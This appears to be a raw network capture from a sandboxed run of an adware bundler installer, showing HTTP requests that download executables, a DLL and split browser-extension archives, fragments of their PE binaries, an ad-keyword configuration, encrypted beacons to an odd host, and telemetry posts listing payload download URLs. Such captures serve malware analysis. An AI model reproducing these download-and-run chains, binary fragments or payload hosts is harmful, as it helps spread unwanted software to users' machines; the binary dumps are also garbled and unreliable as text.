GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: 79p8mVJDPj hjccgd20HesYR0isDL75hdMpJ5XZ4NUM/y7DXEYEfSdMqO2ExWJxj..x-amz-request-id: E131DCC69CFCE49C..Date: Wed, 23 Sep 2015 14:46:15 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;..
GET /36e0f22eacad857de2cd3b76aedc24a7.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d16hr9n7t75k58.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 74681
Connection: keep-alive
Date: Wed, 23 Sep 2015 13:30:29 GMT
Last-Modified: Wed, 23 Sep 2015 13:25:00 GMT
ETag: "ff7d4d6986b438f0c3c8541171bd3abe"
Accept-Ranges: bytes
Server: AmazonS3
Age: 4515
X-Cache: Hit from cloudfront
Via: 1.1 8ba00e7b6e8959a64c4f6f61fd5596de.cloudfront.net (CloudFront)
X-Amz-Cf-Id: wZ1hIueu9YRBNArEcv8TJhJRVdN_E4_7XQp-vALwq1WJEwP13Zd8Tg==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................0!..............................................t....... !..............................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...0...............................rsrc........ !......z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET /crossbrowse/ie/107/ie.zip.003 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 23 Sep 2015 14:45:44 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441008913"
Last-Modified: Mon, 31 Aug 2015 08:15:13 GMT
Cache-Control: max-age=69478
Content-Length: 8244985
Content-Type: text/plain; charset=UTF-8
X-HW: 1443019545.dop001.fr7.t,1443019544.cds002.fr7.c
l...%...J.....=.6...<.,........#....U.s.I.* m..e_O.'.x..4.SV..x...q...d.[.R...A_.....&........."b.....g.........^...N}...$............^..O.&.S....y.Q..vm.!.W........j.kt.......D....%G......*..$.k...@c".e...wu..b.3..oV.....G..ER...o.V..co....v.P..[}.....m.......3.;.E..r.O...{."..'V.-....V.L.4....RF. .:`....M.8..z....z.m....7>...<t?.)$g.'.....~..i.i..W..gV...vZV......dy.cec<F2.8..ZT.W...}d.m..m5..h^...../.@.c.F.....vW......<.PQ....I.8...L-...C...........<%....n..b.4.3gJ.h.D.U...8....PV80..R.so~..k..S QGp4.%.i..I..?...Z@%.B..U!1..m.3.........|7h..s.;V,WBbPQ}=.......%..o......hc........5.9...v|.t...<"....t.Z6.........f.4.3.H..Y ...d...C-.u...B.....RIK:.*$$JP.........q..v.-........$....q..@.../-.. 6Ie.....7....0b...NR.Ti.<U.@a.$.8.m`.i... ~.Y.)j0....%....M.... .CF?0......pd.........M......~m.8.#3b .>...3|`./|W.=../#7j\U..k..@7..G.1.K..?=J../ ?....M...U.`...P.2....A&'?.:oI...\.}6...=k..D..Jv..<HfG..).>p..?.R1....GUo._.mb.M" X...6........#...V$...........GX[R...=.xX.C ~N.2..!gs.(.o...qa.......y0..G......p$0. ^.`.@.*..)?....u.&...L......6....................Q$....4AJFn....kj...................q...Q.K;.E.}..\9eL..jO4.....N..Y.........}GD{.j.....d.c.(...uMK$.h.T........~0..T.<a......PPC..x..&.%`}."5...Q%.4RS..F>@T.}...;..w...zOoL....^DX.<..'.M.Nl\..E{(.}....5.s.(....a.[...,....@.xD.:$.D?.h...:T.=r./.VD.V......k.J..9.dC..g.>_.9.........(RiV......]...}....u7.J..:c.,...D....O..-..A.x.... PP..j;...b...TA..(.,]... r..........t.....5.7`H.)<6A...9.....tD...bl.]e....F....{ .....5..
<<< skipped >>>
GET /sdk/binsis/2.2/BiTool.dll HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d27foqb3kkzkt9.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 59904
Connection: keep-alive
Server: nginx
Date: Thu, 23 Jul 2015 01:04:56 GMT
Last-Modified: Tue, 15 Oct 2013 19:55:30 GMT
ETag: "525d9db2-ea00"
Expires: Thu, 23 Jul 2015 01:14:56 GMT
Cache-Control: max-age=600
Accept-Ranges: bytes
Age: 563
X-Cache: Hit from cloudfront
Via: 1.1 7f0216233154388a0ffe191ece5a7b12.cloudfront.net (CloudFront)
X-Amz-Cf-Id: f6bHYcvEHmiEjHE3LorWjU-OwQXqFp-c6SNrC7rpXU-TS7SNfpAWbg==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......I}.I..h...h...h..S....h..d....h..d....h..d....h..d....h...i.W.h..d....h..d....h..d....h.Rich..h.................PE..L.....]R...........!.........,......e........................................ ......9.....@.....................................................................0...................................`...@...............H............................text..._........................... ..`.rdata..5...........................@..@.data...x...........................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................U..Q.M..E..M....E...]...........U..Q.M..E.....].U..Q.M...]......U..Q.M..E........E...]..........U..Q.M..E..M.......]............U......M..E..8.t..M.........E....E......E...]...U..Q.M..E..M...3.;......].......U..Q.M..E.3..8........].........U..Q.M..E.P.M........M........E...].............U..Q.M..E........M.........]....U..Q.M..M.......E....t..M.Q.Z.......E...].......U...E.].........U..j.h....d.....PQ.....3.P.E.d......M..M........E......E........M.Q.M...........E......E..M.d......Y..].........U..Q.M..E.......
<<< skipped >>>
GET /cgi-bin/advert/getkws.cgi?did=90068&version=0&key=azJJ.s8MVPsHc HTTP/1.1
User-Agent: gmsd_re_005010095-1.20
Host: ads.under-myscreen.be
Accept: */*
Accept-Encoding: gzip, deflate
Referer:
Cookie:
Accept-Language: en,en-US
X-Guuid: 75ed9567-aa58-4c8e-a8ea-3cad7c47ab03
X-OS-Ver: 5.1.2.2600
HTTP/1.1 200 OK
Date: Wed, 23 Sep 2015 14:46:09 GMT
Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1
X-C4PC-ServerName: ads.under-myscreen.be
Set-Cookie: _c4aid=75ED9567AA584C8EA8EA3CAD7C47AB03; expires=Mon, 21 Mar 16 14:46:00 GMT; domain=under-myscreen.be; path=/;
Set-Cookie: _c4aid2=75ED9567AA584C8EA8EA3CAD7C47AB03,1443019569.24114; expires=Mon, 21 Mar 16 14:46:00 GMT; domain=under-myscreen.be; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
1f1..{"dids":{"90077":{"unmatch":["regiedepub.com|under-myscreen.be|eorezo.com|regiedepub.com"],"match":[{"u":0,"m":"yahoo|live|wikipedia|bing|msn|amazon|tumblr|royalbank|reddit|ebay"},{"u":0,"m":"pinterest|apple|ask|microsoft|bmo|wordpress|cibc|paypal|baidu|cbc"},{"u":0,"m":"xhamster"},{"u":0,"m":"xvideos|imbd|instagram|netflix|craigslist|kickass|td|thepiratebay"},{"u":0,"m":"http|fa|go|yah|hot|twit|blog|msn|apple|facebook|google|twitter|youtube"}]}},"freeze":3600,"refresh":3600,"version":116517}..0..
GET /crossbrowse/ie/107/ie.zip.002 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 23 Sep 2015 14:45:44 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441008912"
Last-Modified: Mon, 31 Aug 2015 08:15:12 GMT
Cache-Control: max-age=69484
Content-Length: 8244985
Content-Type: text/plain; charset=UTF-8
X-HW: 1443019545.dop012.fr7.t,1443019544.cds004.fr7.c
.R...rf..ol......}>....]..m..sr!..m..Mu..v....\..F.....R...[y8...6...7...h.K.52.'.m];."......;........6.Q.Li.T[...<.....P..SJGtW....~......&.{h.X.;<.x...........iX..........qda.....P....6X.....@.(........... .....!E..t......-O..n..z..N.....4s....=0...xa.o....Q..P....z..oNiC. ...{..B.~..B..o.4...UO[.T....Y..f..*..G......h.1...B.I..1...;..3....(...;..M..Q.5..,F.._..$#..K.(..&...Y...O.Q(.>O......UP.<?2_... .%.D..*.H..y...5..U7.#.....J 7.8b...f.r64h.g ....'y.m..M.fW...e..Y.SG..D...a.h..auwR......v......_.s<E.O......Y..n-..hT..p.$J.`>......-...9.2.Is..5...v.~%{b.H.d).......w..m5......X..v~..!.:.K..xEzE...J...V....It..C6...~V6%...uG..bW...........)}..m..|nh..............wB;.M>.E.h..E0..9.....F.ew....J.J......_*4....*{..V(z..}q........u.:tfT...G9'....6......8.....h..r...`s/..kw.H.~...E..r_!.A.U....kbn......2..m]T&&.....p.p,6_.....~........;V.......:.....MI.Vs..'.(..@...B...S...O...<....q.IG....wB$.......Q.&.....4...{^....g..L...e8...b..(n.B<..b5...o......"......!.G.....m^......2.:...^...1xd[..h.^...I...c~.h.....Q.3tv"^k....!.G...d........=:.....5`a....ab$.r'3..:...l..&.d@p...P"..7..w..@.F:.x...o..j..W...%...Cz?.Np......~....GFP ;..Z.......2.~8....R...s......//.7.....l.U>....r.....{0.Gs:......`.pm......_{.".........#d..")..o..-.... ...E.J.....}.XhH;h...4j. ..E..3]g..9.!..T...``r.hwhEbP......L..S/Is|5..`....}|W(...8E76..7...*.l....Wuw....2.....cO..)4c..=X9..zwT...i.`..Rh.......ST.zLL.9..V.}<..<....5.>\H..,...(.l....q>..i2<~.E.F.....b.......\.....j1W.Q...o\s..}.<....$^w.
<<< skipped >>>
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=141783&tag=RE_CLICKMEIN_INSTALL_INI HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 23 Sep 2015 14:46:02 GMT
Server: Apache/2.2.22 (Debian) mod_ssl/2.2.22 OpenSSL/1.0.1e mod_wsgi/3.3 Python/2.7.3 mod_perl/2.0.7 Perl/v5.14.2
Content-Location: settags.cgi
Vary: negotiate
TCN: choice
Cache-Control: no-store, no-cache, must-revalidate
X-C4PC-ServerName: ads.regiedepub.com
P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Expires: Wed, 23 Sep 15 14:46:00 GMT
Set-Cookie: _c4aid=EC7CBC3C3BC244B0B7E54F22FAD4E221; expires=Mon, 21 Mar 16 14:46:00 GMT; domain=regiedepub.com; path=/;
Set-Cookie: _c4aid2=EC7CBC3C3BC244B0B7E54F22FAD4E221,1443019562.09635; expires=Mon, 21 Mar 16 14:46:00 GMT; domain=regiedepub.com; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
41.......if (window.rdp_callback).....rdp_callback(1203, 141783);......0..
GET /crossbrowse/ie/107/ie.zip.004 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 23 Sep 2015 14:45:45 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441008913"
Last-Modified: Mon, 31 Aug 2015 08:15:13 GMT
Cache-Control: max-age=69451
Content-Length: 8244985
Content-Type: text/plain; charset=UTF-8
X-HW: 1443019545.dop010.fr7.t,1443019545.cds005.fr7.c
......."`...P.PB.............z.....R^z......cxT...x... ;K.....8..9i....|9..7...D..p[.2..!!.S.._.^..Z..W..8.@.'..\&!.!k...~..4.......f.V.u...0...^......,T;.....%......ch...F..c.........G.2../l.wr 1.&.?!..r.k.U....}%....w....}.2...}......oD.KX.G....p...s...$.W...c.Q.*<.4...Lz...@r.g;....~..w#..........`..@..m...){..$.......=z...J23..Bp....~.2.j.......pJ..X..C... .U.O5..h............._W...)#....:_lk.b.Z'..]..s0...6Y%..W........<...cP\Y..G.u.,U..B.og...8.C.~.8~..tj...t ....TT.-UQ....M.....1N-.x....P.p.#...wI..W...G.[.jO..Q.2.V1=..,/.......~..........."..Hma..se...^?.k....=...5...p.....I..G.hm. .vD....._...[.l...,.......s....O.....WU.v-:'.j..%...|....7.g...'..o1..._m.,.!.n.V.........Y5...}s<t..G.R3;R;8.....yP=.-.N...l{..r9..4.n&...U4..n..p.W....{d/l......*....!O*.j.}...%Q.....k.j..1=^.@G....!jI..5.....^7.O. ...DwR.....J/.@..4d."... ..$...#..........Xc.R>Vv.......;.d..C..W....'.....8 .*4Xw.drM.^...UE.C...]>.....ycA.... ....l..:..z..y....=I......9.........z.y......uX.... .T..........d-dj.7.d.!Q.qCqj.4.S{.&.".......s;..P.\.l..7...-OP....I...._\.YX2.6.Mb..._...5O.4....e..tyo...z.z.2.8..5........W..7......|.$............^..]..x...|...S...$....F.|_.SS......=...'...`rX....y...e.O..b...............U9hPfr..5KJ6;&.....d.d.......... .j....Wu.:...hk...a..s...]......?..T.]..8.cRN...........6..C=[.k....`......s]$.B, ....7;A......... ^.h~{..\:ybG.$..f.Q..l........#..FB.. ..........;.,RS.4].B-...N.EyNE...q.P_..g..}AY~_gz......42...%......Nx..D.D.!.]...[..o.1..&....."W.........nKK..).....<.x.@............?.m......c
<<< skipped >>>
POST /cgi-bin/get_protect.cgi HTTP/1.1
x-spidermessenger-crypted: 2
x-spidermessenger-crc32: 2859971505
x-spidermessenger-length: 275
Content-Type: text/*
User-Agent: gmsd_re_005010095-gmsd_re_005010095
Host: prof.youandmeandmeandyouhihi.com
Content-Length: 396
Cache-Control: no-cache
ujXl2iaEv38K+/yRWyXC+m7rYR+qMqcsQlG9GDKStkh98UP7deGEL5TaOKz1g+yqMJ3aCxnSq9+rMWq0WaUI+m5dHRt9cx1O7Z3jpCadG7OGTYHWSMH8wzRHTMkF3kA01FDSNvjutJ7/HJWKy4+gBy57rakpQjqpqIz6s6LnllH2VQ0beOHk8I9qsR7xuPuZeyGsBKlUlGPwBGLbWehme9YY/kr4ejmocAgdiLrIo6u7FwqD13aS3h/yt81Vg2KJrTDx63yjg6W3ua6TxQzzmoVxj1Me2R/cfk868QyP9qi/VKzjQCJJ1FbIhSa5GWYZV5WMUZmizNFubZ2WcJgi++wII5ZgoesQ0t9SKBmNpq8=
HTTP/1.1 200 OK
Date: Wed, 23 Sep 2015 14:46:08 GMT
Server: Apache/2.2.22
x-SPIDERMESSENGER-crypted: 2
x-SPIDERMESSENGER-length: 26782
x-SPIDERMESSENGER-crc32: -1
Set-Cookie: conftime=1443019568; expires=Mon, 17 Jan 16 08:32:00 GMT; domain=youandmeandmeandyouhihi.com; path=/;
Set-Cookie: EoRezo=194.242.96.218.1443019568967145; path=/; expires=Fri, 23-Oct-15 14:46:08 GMT
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
Content-Type: text/plain
8b8c..0NogVEVNeZU/g6fcxXpPm8L/TbLACp6qNZeGXV8m6ec/K8dk0/yY5pEI4yS2Vf5K1CwWkZ8xeq2FoHZiTq7fWERGyCAg88jpdmzVknJJbtdhSvgVLNEQZKmNKxPN3kfiTP01QVCwkIhmgh8hn cj7eWsZKhcfTiMp1ErcCXmvxcJzGdkjAmepZXFf 9mvmx3MoaAaU4S9HOXqolKS L396Ms2AMXL7A9nS7mSIeZrH1Fibnvq1SMZYSdrNnlHEVOS4UhF22b2sfD/1N/sbg5OaCYk/ wsk9Tw2WwjfHvW38KDEsMQoM4jfY4GxZT2T5xe49I4GoJ165rbxbArH12unq888qQKOiF0SDva4WNiyAhG6aL26hAt8jBhqb90UtfEfnF7LP OsSKGGmX9P4Uk1PVImDE3GLR uCwDOqMMI3M/tsOmPtxiXkVKlH 6Q4T9uKM5gmsWzGoJnOPywaMlgirmUtOuTd3YUN8yLjG0mYk5utNCMCbd1C7cxI6TX44of4egeFCjbtc17m2fXGImZF 9WaoEA4aJgOOtQ/7OLaIE1cZaZCHR9ReISNtRbv3h 150BIFls4H9IYyqdMapSkjmaQpgWq6q5fXDfw0nkpav6z3ib7gMnZodptvgkJ68J1YYADTNTxvfuV5ycdcHw4b4aGJfYZbix1I0JiSoxx3nmZwBGmHO5slBfMZof9dnSbgj7DT1zM1gvK3EDaIovg6fPeZol4QhEaQWWA/AYYWq5zM4voXGJkD6PObW9tALHQyIZI/ITmnQJQNo/evm7sXhNdMB1ACqi0VnzsxS74zg/qIo//uNysOzjMrB6DtR7clqYAX p8jM3x KOgEuHdO3EUDPvr8UuVpvU0JQcNT8Dc0vAQTqxva/AR iRKas/cTMpjboyYaTmEco h6BVE 3uutOAn2Ce76sKlh6isUxf R biTWbEehTK/DJo66TC jsWtxwuuRwI0k7wWqipHkO954A6bCMnnqFSD/itZUlVyt9pQZHxzQg8hM9XCY vsEuo7aJCaJ6rDi3kL2A29EvBDvMxnf76GH0logfza6czp7VsXgowH9ggrG7 y17T4LJ8RD67xnt4m303ZyGhKRtpuoug4EZOGxus5zLNHsOCAsLCm1YLeMuQeQ1FnO/P3HE0MmLRRsybbgQcI42pOBpuVOfQxQgluflf1CUJUrDraSumXW2AEY5hPbcB8PRYa0A1dpoGNRkZAb/Mls2/mbgbo95Wy1J0jrR08/iBd9qsnrScZkAqgrPSLbJzViRvTwLeoGsguOGmJCrfp9zsGsjLCS7FmAX01mhrsfvcPF3KlP0TAhrcLcX FlEBf6/mxS6/NRQcQ1b8pVAqo2X0ILAgVymsUji0ZYzBI7xfS TYDONLPM3icvXfvDrHGZ041kcKeFe jph/qrtHOzRqT9T56J8WhIsQiZ1cZzVMl26SruAhVH6/BSIfUtlkYe//ZPOHJb2dJQly eLAG9tPWU0a0PmLmCzhO35M9uYlebn2yAOImXE/RD
<<< skipped >>>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1726\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Wed, 23 Sep 2015 14:45:38 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 126
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1727\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"tst=&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Wed, 23 Sep 2015 14:45:38 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 23 Sep 2015 14:45:38 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 177
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Wed, 23 Sep 2015 14:45:39 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 23 Sep 2015 14:45:39 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 190
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Wed, 23 Sep 2015 14:45:39 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 23 Sep 2015 14:45:39 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 181
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://livestatscounter.com/SysInfo/validator/timer.php&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Wed, 23 Sep 2015 14:45:40 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 23 Sep 2015 14:45:40 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 194
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://livestatscounter.com/SysInfo/validator/timer.php&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Wed, 23 Sep 2015 14:45:40 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 23 Sep 2015 14:45:40 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 183
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Wed, 23 Sep 2015 14:45:43 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 23 Sep 2015 14:45:43 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 196
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Wed, 23 Sep 2015 14:45:43 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 23 Sep 2015 14:45:43 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 199
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d16hr9n7t75k58.cloudfront.net/36e0f22eacad857de2cd3b76aedc24a7.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Wed, 23 Sep 2015 14:45:44 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 23 Sep 2015 14:45:44 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 212
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d16hr9n7t75k58.cloudfront.net/36e0f22eacad857de2cd3b76aedc24a7.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Wed, 23 Sep 2015 14:45:44 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 23 Sep 2015 14:45:44 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 189
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe&v=2\"}"}
